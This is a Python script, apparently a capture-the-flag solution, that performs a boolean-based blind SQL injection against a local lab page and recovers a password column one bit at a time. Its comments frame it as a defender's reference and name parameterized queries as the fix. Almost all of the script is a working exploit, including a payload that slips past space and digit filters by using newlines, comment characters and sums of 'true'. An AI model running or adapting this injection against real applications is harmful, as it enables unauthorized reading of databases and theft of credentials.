blind-sql-injection
import requests
# Boolean-based blind SQL injection demo against a deliberately vulnerable
# local lab page (`sqli3.php` on localhost:9200). Kept as a defender's
# reference for what this class of traffic looks like:
#   * one GET per bit, 8 GETs per recovered character, all to the same
#     endpoint with only the `userid` query parameter varying;
#   * the `userid` value carries URL-encoded newlines (%0a), hashes (%23)
#     and pluses (%2b) and contains no literal spaces or digits;
#   * the response is used purely as a yes/no oracle ("Hello" at offset 0).
# The server-side fix is a parameterized query / prepared statement for
# `userid` (presumably it is concatenated into SQL here — confirm in the
# PHP source); filtering spaces or digits alone is not a sufficient defence,
# since this request avoids both.
url = "http://localhost:9200/sqli3.php"
flag = ""          # characters of the `userpw` column recovered so far
flag_len = 41      # loop bound: idx runs 1..40, one position per iteration
for idx in range(1, flag_len):
    tmp = []  # the 8 bits of the current character, most-significant first
    for count in range(1, 9):
        # Numbers in the payload are written as sums of `true`
        # (`true+true+...`), so no digit literal appears in the request.
        # The inner expression reads bit `count` of the 8-bit binary form of
        # character `idx` of `userpw`; the trailing `#` after each line
        # comments out whatever the server appends to the query.
        payload = f"""a' = 'a'#
and#
userid = concat('ad','min')#
and#
substr( lpad(bin(ascii( substr(userpw, {'+'.join(["true"] * idx)}, true) )), {'+'.join(["true"] * 8)}, false), {'+'.join(["true"] * count)}, true ) = true#"""
        # Percent-encode the characters that must survive the query string;
        # spaces are dropped outright rather than encoded.
        qqq = payload.replace("\n", "%0a").replace("#", "%23").replace("+", "%2b").replace(" ", "")
        # `userpw=a` is a dummy value; only `userid` carries the injection.
        r = requests.get(f"{url}?userid={qqq}&userpw=a").text
        # Oracle: the page begins with "Hello" only when the injected
        # comparison evaluated true, i.e. the selected bit is 1.
        if r.find("Hello") == 0:
            tmp.append("1")
        else:
            tmp.append("0")
    flag += chr(int(''.join(tmp), 2))  # assemble the 8 bits into one character
    print(flag)
    if flag[-1] == "}":  # CTF-style flag terminator; stop once it is reached
        break